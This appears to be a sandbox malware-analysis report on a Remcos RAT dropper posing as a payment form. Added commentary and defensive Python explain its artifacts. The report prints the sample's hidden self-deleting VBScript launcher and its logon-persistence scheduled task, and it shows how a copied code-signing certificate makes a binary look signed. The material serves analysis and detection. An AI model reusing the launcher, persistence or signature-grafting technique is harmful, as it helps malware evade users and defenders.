                                            SHA-512:63252CFDC2CC7A32F86D9CB5D27E1695A8C138EBFBF476741C017EB349F20BDC72FF5856E0044DB189BAABDB1C3819C29FFC33A054810BD0354726300063D52C
                                            Malicious:false
                                            Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.380531179760856
                                            Encrypted:false
                                            SSDEEP:48:DWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:DLHyIFKL3IZ2KRH9Oug8s
                                            MD5:AF312D1F700C41D79551F4CDD0EFF746
                                            SHA1:852C22E41E76C0CA8B52390591380ED383BC9045
                                            SHA-256:A688022D6C85661C85C135EEA8F769F9597A592B98720481B64610E616D02019
                                            SHA-512:3D5B3095D11E1EF79C6137610C686AF95E75AE2ABCF377B854A1220ACCA7EA156F3CE43372004A06FFABF5A9ED7B29A6DD3A4BE9CD263E038771F44206300A33
                                            Malicious:false
                                            Preview:@...e.................................\..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                             Ten further dropped files from C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with the same metadata as the entry above (ASCII text, 60 bytes, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, Malicious:false). These are PowerShell's own __PSScriptPolicyTest_*.ps1 probes, written on every start of powershell.exe to test whether AppLocker or WDAC enforces script policy; they show only that PowerShell ran, not what the sample did.
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):392
                                            Entropy (8bit):3.471121212518824
                                            Encrypted:false
                                            SSDEEP:12:4D8o++ugypjBQMBvFQ4lOnbtwD2F0M/0aimi:4Dh+S0FNObCD2F0Nait
                                            MD5:046708368578D720D91FB9CEECEC742E
                                            SHA1:1DC732F67F48A1D5694F4CF14A8D279DBD1D6EE6
                                            SHA-256:04F4EDC28E97A16F93CF7ACAC864ABA17CC467282550AE61BAAC719262BE6F5E
                                            SHA-512:9106F645EE74C9E061FCB396A00D706512D41054A356125F26A10D42390D8F0D3EA3DD785393BF5DE358B62464EC3C0F7D2E27411E87BB408581F820C427E7F0
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                             Preview (UTF-16LE text without a BOM, which is why the file type is reported as "data"; the raw report shows the NUL bytes as dots):
                                             WScript.Sleep 1000
                                             Set fso = CreateObject("Scripting.FileSystemObject")
                                             CreateObject("WScript.Shell").Run "cmd /c ""C:\ProgramData\AppUpdate\remcos.exe""", 0
                                             fso.DeleteFile(Wscript.ScriptFullName)
                                             The launcher waits one second, starts C:\ProgramData\AppUpdate\remcos.exe through cmd with a hidden window (Run window style 0), then deletes its own script file (Wscript.ScriptFullName), so the script itself is unlikely to be found on a compromised host.
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:true
                                             Preview:
                                             <?xml version="1.0" encoding="UTF-16"?>
                                             <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                                               <RegistrationInfo>
                                                 <Date>2014-10-25T14:27:44.8929027</Date>
                                                 <Author>user-PC\user</Author>
                                               </RegistrationInfo>
                                               <Triggers>
                                                 <LogonTrigger>
                                                   <Enabled>true</Enabled>
                                                   <UserId>user-PC\user</UserId>
                                                 </LogonTrigger>
                                                 <RegistrationTrigger>
                                                   <Enabled>false</Enabled>
                                                 </RegistrationTrigger>
                                               </Triggers>
                                               <Principals>
                                                 <Principal id="Author">
                                                   <UserId>user-PC\user</UserId>
                                                   <LogonType>InteractiveToken</LogonType>
                                                   <RunLevel>LeastPrivilege</RunLevel>
                                                 </Principal>
                                               </Principals>
                                               <Settings>
                                                 <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                                                 <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                                                 <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                                                 <AllowHardTerminate>false</AllowHardTerminate>
                                                 <StartWhenAvailable>true</StartWhenAvailable>
                                                 <RunOnlyIfNetworkAvailable>f
                                             The task fires at every interactive logon of the registering user (LogonTrigger, InteractiveToken) and runs without elevation (LeastPrivilege), so it persists across reboots without a UAC prompt. Its 2014 registration date predates the binary's 2024 link time, which indicates a template carried inside the sample rather than XML generated on the host.
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:false
                                             Preview: identical to the task XML of the previous entry (same hashes).
                                             Three further dropped files from C:\ProgramData\AppUpdate\remcos.exe with the same metadata and hashes as this entry (XML task definition, 1567 bytes, MD5 6578CACDE83BF5ACF30B8C6DDC42668F, Malicious:false).
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1243656
                                            Entropy (8bit):7.6645164763774805
                                            Encrypted:false
                                            SSDEEP:24576:RYdgfvzAKzxWCC9vSA6GRdsttHVqowvVpBdlvlOUa:rzAcWFt96ydyQow5dldna
                                            MD5:FC5A80ADF45D78FFA834283D0A78F9F6
                                            SHA1:6865DEC6F71546EA01420295B7175038C3A81EC4
                                            SHA-256:E588A098E9CEB33F2616E11A3FAF28162E5F4B7F3800B22AB3023BC376AEB18C
                                            SHA-512:27636CD0D31E3B1FF384869F1F2BE6C23D7F02ECD70027C5D689DE0893835D070218596A941472481D637CC6253ED3F2405991A6AF4772596CC88F909A7DD7CB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 53%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>g..............0......(.......... ........@.. ....................... ............@.....................................O........%...............6........................................................... ............... ..H............text....... ...................... ..`.rsrc....%.......&..................@..@.reloc..............................@..B.......................H............3..........tJ.. n............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                             Preview:[ZoneTransfer]....ZoneId=0
                                             ZoneId=0 is URLZONE_LOCAL_MACHINE. A file that arrived from the Internet carries ZoneId=3 (the Mark of the Web); a Zone.Identifier stream with zone 0 written by the sample itself marks the tagged file as local, so SmartScreen and Office Protected View apply no download-origin checks to it.
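The dropped launcher above is a BOM-less UTF-16LE VBScript that the report's file-type probe labels "data", and the Zone.Identifier stream written by the sample carries ZoneId=0. The Python below is an added example, not code from the Joe Sandbox report: it decodes a BOM-less UTF-16 drop, pulls the launched command, window style, delay and self-delete out of a WScript launcher, and reads the zone id from a Zone.Identifier stream. The script bytes and stream bytes are constructed inline from the previews above (the line terminators are an assumption, as the report does not show them); the regular expressions and the "trusted prefix" list are the example's own, not detections from the report.

```python
import re

# Constructed inputs for this example. LAUNCHER_UTF16 is the text of the 392-byte UTF-16LE
# launcher shown above (NUL bytes rendered as dots in the report), re-encoded without a BOM;
# the '\n' line terminators are an assumption. ZONE_IDENTIFIER is the 26-byte stream shown above.
LAUNCHER_UTF16 = (
    'WScript.Sleep 1000\n'
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\ProgramData\\AppUpdate\\remcos.exe""", 0\n'
    'fso.DeleteFile(Wscript.ScriptFullName)\n'
).encode("utf-16-le")
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# Example regexes for WSH launchers (written for this example; not rules from the report).
RUN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"(?P<cmd>(?:""|[^"])*)"\s*(?:,\s*(?P<style>\d+))?', re.I)
SELF_DELETE_RE = re.compile(r'DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)', re.I)
SLEEP_RE = re.compile(r'WScript\.Sleep\s+(\d+)', re.I)
EXE_RE = re.compile(r'[A-Za-z]:\\[^"]*?\.exe', re.I)
# Anything launched from outside these prefixes counts as a user-writable drop location (assumption).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")


def decode_text(blob: bytes) -> str:
    """Decode a dropped text file. A BOM-less UTF-16 script is reported as 'data' by libmagic;
    recognise it by the NUL in every second byte and decode it as UTF-16LE."""
    if blob.startswith(b"\xff\xfe"):
        return blob[2:].decode("utf-16-le")
    if len(blob) >= 4 and blob[1::2].count(0) > 0.9 * (len(blob) // 2):
        return blob.decode("utf-16-le")
    return blob.decode("utf-8", errors="replace")


def triage_launcher(script: str) -> dict:
    """Extract what matters from a WScript launcher: what it runs, whether the window is
    hidden (style 0), whether it delays, and whether it deletes itself afterwards."""
    launches = []
    hidden = False
    for m in RUN_RE.finditer(script):
        launches.append(m.group("cmd").replace('""', '"'))  # VBScript doubles quotes inside strings
        hidden = hidden or m.group("style") == "0"
    exe_paths = EXE_RE.findall(" ".join(launches))
    sleep = SLEEP_RE.search(script)
    return {
        "launches": launches,
        "hidden_window": hidden,
        "sleeps_ms": int(sleep.group(1)) if sleep else 0,
        "self_deletes": bool(SELF_DELETE_RE.search(script)),
        "exe_paths": exe_paths,
        "outside_program_dirs": [p for p in exe_paths if not p.lower().startswith(TRUSTED_PREFIXES)],
    }


ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}


def parse_zone_identifier(stream: bytes) -> dict:
    """Parse a Zone.Identifier alternate data stream. ZoneId 3 (Internet) or 4 is the Mark of
    the Web; ZoneId 0 means the file is treated as local."""
    fields = {}
    for line in stream.decode("utf-8", errors="replace").splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    zone = int(fields.get("ZoneId", -1))
    return {
        "zone_id": zone,
        "zone": ZONE_NAMES.get(zone, "unknown"),
        "has_motw": zone >= 3,
        "referrer_url": fields.get("ReferrerUrl"),
        "host_url": fields.get("HostUrl"),
    }


if __name__ == "__main__":
    print(triage_launcher(decode_text(LAUNCHER_UTF16)))
    print(parse_zone_identifier(ZONE_IDENTIFIER))
```

On a live host the same checks apply to the on-disk artifacts: a launcher that runs a binary from ProgramData with a hidden window and then deletes itself, and a dropped file whose Zone.Identifier says zone 0 although the parent process arrived from the Internet, are both worth an alert on their own.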
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.6645164763774805
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Payment Transfer Request Form.bat.exe
                                            File size:1'243'656 bytes
                                            MD5:fc5a80adf45d78ffa834283d0a78f9f6
                                            SHA1:6865dec6f71546ea01420295b7175038c3a81ec4
                                            SHA256:e588a098e9ceb33f2616e11a3faf28162e5f4b7f3800b22ab3023bc376aeb18c
                                            SHA512:27636cd0d31e3b1ff384869f1f2be6c23d7f02ecd70027c5d689de0893835d070218596a941472481d637cc6253ed3f2405991a6af4772596cc88f909a7dd7cb
                                            SSDEEP:24576:RYdgfvzAKzxWCC9vSA6GRdsttHVqowvVpBdlvlOUa:rzAcWFt96ydyQow5dldna
                                            TLSH:6C45C020B6F8DE67E27AA1F3DAC4821197B6D141767BD3AA0CC564CE25D27321383D27
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0......(........... ........@.. ....................... ............@................................
                                            Icon Hash:130b253d1931012d
                                            Entrypoint:0x52b8e6
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x673E8CDC [Thu Nov 21 01:29:00 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Signature Valid:false
                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                            Signature Validation Error:The digital signature of the object did not verify
                                             Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash computed over the image does not match the digest inside the signed data). A bad digest means the signature was made over different bytes: either the file was modified after signing or, as the unrelated subject and the 2018-2021 validity period listed below suggest against the 2024 link timestamp above, the signature block was copied from another signed binary. Either way the "Digitally signed: true" line above conveys no trust.
                                            Not Before, Not After
                                            • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                            Subject Chain
                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                            Version:3
                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                            Serial:7C1118CBBADC95DA3752C46E47A27438
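The block above reports "Digitally signed: true" but "Signature Valid: false" with error -2146869232, i.e. HRESULT 0x80096010 (TRUST_E_BAD_DIGEST). The Python below is an added example, not code from the report or from Joe Sandbox: it implements the Authenticode PE hashing rule (skip the CheckSum field, the Certificate Table data-directory entry and the certificate table itself; hash the remaining headers, the sections in file order, then any overlay) and shows that a certificate table copied from one image onto another fails in exactly this way. The minimal PE32 images and the "signature" (a bare SHA-256 standing in for the PKCS#7 SignedData that real Authenticode carries) are constructed for the example.

```python
import hashlib
import struct

TRUST_E_BAD_DIGEST = 0x80096010  # "The digital signature of the object did not verify"


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Hash a PE image the way Authenticode does: skip the CheckSum field, the Certificate
    Table data-directory entry and the certificate table; cover everything else."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", pe, opt)[0] == 0x20B
    size_of_headers = struct.unpack_from("<I", pe, opt + 60)[0]
    checksum_off = opt + 64                            # same offset in PE32 and PE32+
    cert_entry_off = opt + (144 if pe32plus else 128)  # IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_size = struct.unpack_from("<II", pe, cert_entry_off)[1]

    h = hashlib.new(algo)
    h.update(pe[:checksum_off])                        # headers up to CheckSum
    h.update(pe[checksum_off + 4:cert_entry_off])      # ... skipping CheckSum ...
    h.update(pe[cert_entry_off + 8:size_of_headers])   # ... and the certificate directory entry
    hashed = size_of_headers
    sections = []
    for i in range(num_sections):
        hdr = opt + size_of_opt + i * 40
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        sections.append((raw_ptr, raw_size))
    for raw_ptr, raw_size in sorted(sections):         # section data in file order
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    extra = len(pe) - hashed - cert_size               # overlay, minus the certificate table
    if extra > 0:
        h.update(pe[hashed:hashed + extra])
    return h.hexdigest()


def build_pe(code: bytes, cert_blob=None, checksum: int = 0) -> bytes:
    """Assemble a minimal single-section PE32 image (constructed for this example, not a real
    binary). cert_blob, if given, becomes the body of a WIN_CERTIFICATE in the certificate table."""
    align = 0x200
    code = code.ljust(align, b"\0")[:align]
    if cert_blob is None:
        cert, cert_entry = b"", (0, 0)
    else:
        body = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
        cert = body.ljust(-(-len(body) // 8) * 8, b"\0")             # 8-byte aligned
        cert_entry = (align + len(code), len(cert))
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)    # i386, one section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32
    struct.pack_into("<I", opt, 16, 0x1000)                           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                         # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, align)                   # Section/FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, align)                   # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)                         # CheckSum
    struct.pack_into("<H", opt, 68, 2)                                # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 128, *cert_entry)                    # Certificate Table entry
    sec = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(code), 0x1000, len(code), align, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(align, b"\0")
    return headers + code + cert


def check_embedded_digest(pe: bytes):
    """Compare the digest stored in the certificate table with a fresh Authenticode hash.
    Simplification: the WIN_CERTIFICATE body here is the bare SHA-256; real Authenticode wraps
    it in PKCS#7 SignedData (SpcIndirectDataContent) and also validates the signer's chain."""
    opt = struct.unpack_from("<I", pe, 0x3C)[0] + 24
    pe32plus = struct.unpack_from("<H", pe, opt)[0] == 0x20B
    cert_off, cert_size = struct.unpack_from("<II", pe, opt + (144 if pe32plus else 128))
    if cert_size == 0:
        return "unsigned", 0
    if pe[cert_off + 8:cert_off + 40].hex() == authenticode_hash(pe):
        return "valid", 0
    return "bad_digest", TRUST_E_BAD_DIGEST


def hresult_as_signed(hresult: int) -> int:
    """Windows tooling prints HRESULTs as signed 32-bit values: 0x80096010 -> -2146869232."""
    return struct.unpack("<i", struct.pack("<I", hresult))[0]


# Constructed sample: "sign" one image, then graft its certificate table onto a different image,
# which is what copying a signature block from a legitimately signed binary onto malware does.
ORIGINAL_CODE = b"\x55\x8b\xec\x33\xc0\x5d\xc3"           # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret
OTHER_CODE = b"\x55\x8b\xec\xb8\x01\x00\x00\x00\x5d\xc3"  # same prologue/epilogue, but mov eax,1
SIGNATURE = bytes.fromhex(authenticode_hash(build_pe(ORIGINAL_CODE)))
SIGNED = build_pe(ORIGINAL_CODE, SIGNATURE)
GRAFTED = build_pe(OTHER_CODE, SIGNATURE)
```

Because the certificate table is excluded from the hash, appending a legitimate WIN_CERTIFICATE blob to a different binary is trivial and the result still shows as "signed" in a file-properties dialog; only verification catches it. Treat any verification status other than Valid as unsigned, and check the signer's identity against what you expect even when the status is Valid.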
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al        (repeated 97 times: 194 zero bytes following the stub, decoded as instructions)
Note: with the preferred image base 0x400000, 0x402000 is RVA 0x2000, which the data directories below list as the IAT (size 8: one thunk plus terminator). Its only entry is mscoree!_CorExeMain, so the entry point is the standard native stub of a .NET executable; everything of interest is in managed code inside the high-entropy .text section.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x12b894         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x12c000         0x2588        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x12c400         0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x130000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
